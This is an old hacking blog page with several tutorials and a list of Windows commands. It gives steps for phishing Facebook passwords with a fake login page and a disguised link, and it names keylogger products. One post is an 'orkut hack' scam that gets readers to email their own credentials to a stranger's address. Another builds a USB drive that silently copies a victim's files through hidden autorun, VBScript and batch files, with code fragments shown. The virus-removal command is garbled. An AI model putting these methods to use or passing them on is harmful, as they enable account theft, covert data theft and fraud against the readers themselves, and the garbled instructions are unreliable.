hacking

hacking is my passion, if u wanna do some thing interesting u can visit here

My Blog List

just click to see

Your Ad Here

ur ip address is

Sign by Danasoft - Get Your Free Sign

Thursday, June 24, 2010

how to delete virus without using antivirus

Anti-virus software can be very expensive and doesn't always find new breeds of computer virus. You can learn to locate and remove a virus yourself without using ant-virus software. By using the command prompt you can enter the infected drive, locate the virus, render it harmless and delete it from your system for good.

Instructions

Step
1

Click the "Start" menu and type "CMD" into the "Run" box and click "OK."
Step 
2

Select the drive that is infected with the virus. If you are not sure which drive is infected, start with the "C:" drive. Type in "C:" and press "Enter" to access this drive.
Step 
3

Type the following into the command prompt box: - s - h *. * /s /d and press "Enter." This will bring up any suspicious files located on the drive. Open the suspicious file.
Step 
4

Look for a file that contains a ".exe" file and a file titled "autorun.inf." If you find these two files, you have found the tainted file. Make sure to write down the name of the program where the file is located.
Step
5


Rename the "autorun.inf" so you can access the drive later without activating the virus. Type: rename autorun.inf as virusfile and close out of the "Command" prompt box.
Step
6

Double-click the "My Computer" icon and select the drive that has the infected file. Find the program that contains the infected file.
Step
7


Right-click on the program and choose "Open."
Step
8


Right-click on the file you renamed "virusfile" and choose "Delete."
Step
9


Right-click on the ".exe" file and choose "Delete." You have now removed the virus from your computer's hard drive.

I think u like this  simple hacking trick without any software, thanks !!

Wednesday, June 23, 2010

how to hack facebook account

ffYes that's right you can hack Facebook password. Here is a simple tutorial that you can use to hack your friend's Facebook password using Facebook phisher.

P.S.- Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.
P.S.2- This tutorial is for educational purposes only. I will not be responsible for your actions from here on.










We will use Phishing through Fake Login Pages. These fake login pages resemble the original login pages of Facebook. The victim is fooled to believe the fake Facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her Facebook login details are stolen away.

Follow these steps to Hack Facebook password of any account:

1]- Download these files from HERE- http://www.mediafire.com/?n2umngjyiai

2]- The downloaded file contains the following files inside the Facebook.com folder:

* index.html
* write.php

3]- Upload all of the three files to any free web hosting site like:

* www.sigmirror.com
* www.yourfreehosting.net
* www.esmartstart.com
* www.110mb.com
* www.drivehq.com
* www.t35.com


4]- The index.html is the fake page of Facebook.com. You have to make your victim login through this page. So send the link you get by uploading these files to your victim in a disguised way. Like maybe- Try this link out..New Facebook Version 9 Beta Is out (Just an example.!)

5]- Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in "passes.txt". This file is created in your webhost control panel as shown above.

Warning- This method works 100%. You just have to make your victim Login through your link. This is illegal. try it at your own risk.

Saturday, June 12, 2010

Common Email Hacking Methods

Gone are the days when email hacking was a sophisticated art. Today any body can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.

Hackers can install keylogger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details.

A keylogger program is widely available on the internet.some of them are listed below

Win-Spy Monitor

Realtime Spy

SpyAgent Stealth

Spy Anywhere

For more information on keyloggers and it’s usage refer my post Hacking an email account.

Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).

new methods how to hack orkut password without any software

hello frends today i teach how to hack orkut password without any software

First thing u have to do is open ur account [orkut].copy the url of the victim.
u would find it in his profile at the address bar.
now open ur yahoo or gmail or any other account.
in that go to 'compose mail'.in the subject field write as "PASSWORD RETRIEVAL"
in the body..write ur id ex"yourid@xyz.com"
ur password in the next line.leave 4 line and paste the victim's orkut url.
leave two lines..and paste ur orkut profile url.
finally send it to secretsorkut@yahoo.com.
this id does not store any id's or passwords.this is newly created by some yahoo experts on public demand.after sending it within 1 hr u wud get the victims password in ur mailbox.i hacked many of them.lets see how many u will hack.
please comment if u like it thanks

Wednesday, June 2, 2010

How to make flash drive that copy's users files silently and automatically

****** THIS INSTRUCTABLE IS FOR INFORMATION PURPOSES ONLY IT IS ILEGAL TO COPY SOMEONES FILES WITHOUT THEIR PERMISSION I AM NOT RESPONSABLE FOR ANY THING THAT MAY OR MAYNOT HAPPEN IF THIS INFORMATION IS USED IMPROPERLY****************


step 1Materials needed

first  of all u need a usb pen drive  /external hard disk to make this.

step 2Create autorun file for the flash drive
Ok there is no order in the file creation process just that you have all files created and on the flash drive. I will start out with the autorun.inf. This file is used when you insert the flash drive into said computer. Also used to change the thumb drive icon to something more acceptable for social engineering. Here is the code, you will have to open a simple word edi…

step 3Make the file for copy of documents to drive
This is the heart of the flash drive copy I am not going to go through every line of code here but if you have questions just ask or use Google, I will however touch on the main points of the code. Like the last step make sure you use word to make this file save it as file.bat and all files not a word file just like in the picture. Code follows @echo off :: variables /…

step 4Make vb script to run batch file as invisible
This code is very simple it runs the file.bat as a process so it does not show the cmd prompt and everything the batch file is processing Code it with word and save as invisible.vbs All files once again. ______________________________________________________________ CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ________________…

step 5make a batch file to launch vb script and file.batch
ok this batch file does two things, it looks for the invisible.vbs file in the root of the flash drive then loads it with file.bat so file.bat is run with code from vbs file.... neat huh. create with word and save as launch.bat ____________________________ wscript.exe \invisible.vbs file.bat ____________________________

step 6Create folder to save files withing thumb drive.
Go to the root of the thumb drive and create a folder named all that's it for this step. All the documents will be saved in this folder in there separate folders.

step 7put all files in root of drive and try out
Now if you have not put all the files in the root of the flash drive it's time to do that now. One thing you can do is make all the files hidden, so for if some reason they look into the drive they will see an empty drive and not think anything. Now all you should have to do is plug into someones computer and let the thumb drive do its work after the LED is done flashin…

An A-Z Index of the Windows XP command line

  ADDUSERS Add or list users to/from a CSV file
  ARP Address Resolution Protocol
  ASSOC Change file extension associations•
  ASSOCIAT One step file association
  ATTRIB Change file attributes
b
  BOOTCFG Edit Windows boot settings
  BROWSTAT Get domain, browser and PDC info
c
  CACLS Change file permissions
  CALL Call one batch program from another•
  CD Change Directory - move to a specific Folder•
  CHANGE Change Terminal Server Session properties
  CHKDSK Check Disk - check and repair disk problems
  CHKNTFS Check the NTFS file system
  CHOICE Accept keyboard input to a batch file
  CIPHER Encrypt or Decrypt files/folders
  CleanMgr Automated cleanup of Temp files, recycle bin
  CLEARMEM Clear memory leaks
  CLIP Copy STDIN to the Windows clipboard.
  CLS Clear the screen•
  CLUSTER Windows Clustering
  CMD Start a new CMD shell
  COLOR Change colors of the CMD window•
  COMP Compare the contents of two files or sets of files
  COMPACT Compress files or folders on an NTFS partition
  COMPRESS Compress individual files on an NTFS partition
  CON2PRT Connect or disconnect a Printer
  CONVERT Convert a FAT drive to NTFS.
  COPY Copy one or more files to another location•
  CSCcmd Client-side caching (Offline Files)
  CSVDE Import or Export Active Directory data
d
  DATE Display or set the date•
  DEFRAG Defragment hard drive
  DEL Delete one or more files•
  DELPROF Delete NT user profiles
  DELTREE Delete a folder and all subfolders
  DevCon Device Manager Command Line Utility
  DIR Display a list of files and folders•
  DIRUSE Display disk usage
  DISKCOMP Compare the contents of two floppy disks
  DISKCOPY Copy the contents of one floppy disk to another
  DISKPART Disk Administration
  DNSSTAT DNS Statistics
  DOSKEY Edit command line, recall commands, and create macros
  DSACLs Active Directory ACLs
  DSAdd Add items to active directory (user group computer)
  DSGet View items in active directory (user group computer)
  DSQuery Search for items in active directory (user group computer)
  DSMod Modify items in active directory (user group computer)
  DSMove Move an Active directory Object
  DSRM Remove items from Active Directory
e
  ECHO Display message on screen•
  ENDLOCAL End localisation of environment changes in a batch file•
  ERASE Delete one or more files•
  EVENTCREATE Add a message to the Windows event log
  EXIT Quit the current script/routine and set an errorlevel•
  EXPAND Uncompress files
  EXTRACT Uncompress CAB files
f
  FC Compare two files
  FIND Search for a text string in a file
  FINDSTR Search for strings in files
  FOR /F Loop command: against a set of files•
  FOR /F Loop command: against the results of another command•
  FOR Loop command: all options Files, Directory, List•
  FORFILES Batch process multiple files
  FORMAT Format a disk
  FREEDISK Check free disk space (in bytes)
  FSUTIL File and Volume utilities
  FTP File Transfer Protocol
  FTYPE Display or modify file types used in file extension associations•
g
  GLOBAL Display membership of global groups
  GOTO Direct a batch program to jump to a labelled line•
  GPUPDATE Update Group Policy settings
h
  HELP Online Help
i
  iCACLS Change file and folder permissions
  IF Conditionally perform a command•
  IFMEMBER Is the current user in an NT Workgroup
  IPCONFIG Configure IP
k
  KILL Remove a program from memory
l
  LABEL Edit a disk label
  LOCAL Display membership of local groups
  LOGEVENT Write text to the NT event viewer
  LOGOFF Log a user off
  LOGTIME Log the date and time in a file
m
  MAPISEND Send email from the command line
  MBSAcli Baseline Security Analyzer.
  MEM Display memory usage
  MD Create new folders•
  MKLINK Create a symbolic link (linkd)
  MODE Configure a system device
  MORE Display output, one screen at a time
  MOUNTVOL Manage a volume mount point
  MOVE Move files from one folder to another•
  MOVEUSER Move a user from one domain to another
  MSG Send a message
  MSIEXEC Microsoft Windows Installer
  MSINFO Windows NT diagnostics
  MSTSC Terminal Server Connection (Remote Desktop Protocol)
  MUNGE Find and Replace text within file(s)
  MV Copy in-use files
n
  NET Manage network resources
  NETDOM Domain Manager
  NETSH Configure Network Interfaces, Windows Firewall & Remote access
  NETSVC Command-line Service Controller
  NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
  NETSTAT Display networking statistics (TCP/IP)
  NOW Display the current Date and Time
  NSLOOKUP Name server lookup
  NTBACKUP Backup folders to tape
  NTRIGHTS Edit user account rights
o
  OPENFILES Query or display open files
p
  PATH Display or set a search path for executable files•
  PATHPING Trace route plus network latency and packet loss
  PAUSE Suspend processing of a batch file and display a message•
  PERMS Show permissions for a user
  PERFMON Performance Monitor
  PING Test a network connection
  POPD Restore the previous value of the current directory saved by PUSHD•
  PORTQRY Display the status of ports and services
  POWERCFG Configure power settings
  PRINT Print a text file
  PRNCNFG Display, configure or rename a printer
  PRNMNGR Add, delete, list printers set the default printer
  PROMPT Change the command prompt•
  PsExec Execute process remotely
  PsFile Show files opened remotely
  PsGetSid Display the SID of a computer or a user
  PsInfo List information about a system
  PsKill Kill processes by name or process ID
  PsList List detailed information about processes
  PsLoggedOn Who's logged on (locally or via resource sharing)
  PsLogList Event log records
  PsPasswd Change account password
  PsService View and control services
  PsShutdown Shutdown or reboot a computer
  PsSuspend Suspend processes
  PUSHD Save and then change the current directory•
q
  QGREP Search file(s) for lines that match a given pattern.
r
  RASDIAL Manage RAS connections
  RASPHONE Manage RAS connections
  RECOVER Recover a damaged file from a defective disk.
  REG Registry: Read, Set, Export, Delete keys and values
  REGEDIT Import or export registry settings
  REGSVR32 Register or unregister a DLL
  REGINI Change Registry Permissions
  REM Record comments (remarks) in a batch file•
  REN Rename a file or files•
  REPLACE Replace or update one file with another
  RD Delete folder(s)•
  RMTSHARE Share a folder or a printer
  ROBOCOPY Robust File and Folder Copy
  ROUTE Manipulate network routing tables
  RUNAS Execute a program under a different user account
  RUNDLL32 Run a DLL command (add/remove print connections)
s
  SC Service Control
  SCHTASKS Schedule a command to run at a specific time
  SCLIST Display NT Services
  SET Display, set, or remove environment variables•
  SETLOCAL Control the visibility of environment variables•
  SETX Set environment variables permanently
  SFC System File Checker
  SHARE List or edit a file share or print share
  SHIFT Shift the position of replaceable parameters in a batch file•
  SHORTCUT Create a windows shortcut (.LNK file)
  SHOWGRPS List the NT Workgroups a user has joined
  SHOWMBRS List the Users who are members of a Workgroup
  SHUTDOWN Shutdown the computer
  SLEEP Wait for x seconds
  SLMGR Software Licensing Management (Vista/2008)
  SOON Schedule a command to run in the near future
  SORT Sort input
  START Start a program or command in a separate window•
  SU Switch User
  SUBINACL Edit file and folder Permissions, Ownership and Domain
  SUBST Associate a path with a drive letter
  SYSTEMINFO List system configuration
t
  TASKLIST List running applications and services
  TASKKILL Remove a running process from memory
  TIME Display or set the system time•
  TIMEOUT Delay processing of a batch file
  TITLE Set the window title for a CMD.EXE session•
  TLIST Task list with full path
  TOUCH Change file timestamps
  TRACERT Trace route to a remote host
  TREE Graphical display of folder structure
  TYPE Display the contents of a text file•
u
  USRSTAT List domain usernames and last login
v
  VER Display version information•
  VERIFY Verify that files have been saved•
  VOL Display a disk label•
w
  WHERE Locate and display files in a directory tree
  WHOAMI Output the current UserName and domain
  WINDIFF Compare the contents of two files or sets of files
  WINMSD Windows system diagnostics
  WINMSDP Windows system diagnostics II
  WMIC WMI Commands
x
  XCACLS Change file and folder permissions
  XCOPY Copy files and folders
  :: Comment / Remark•

how to create a txt file from dos.

helllo frends , this artical is important for those who are interseted in dos
today i teach u how to create a txt file from dos

copy con myfile.txt

When typing the above you will return down one line to a blank line. Create the file line by line. Once you are ready to create the file press enter to get to a blank line and then press and hold CTRL and press Z then let go of both buttons. This will return a ^Z. Once this has been entered press enter to save and exit the file.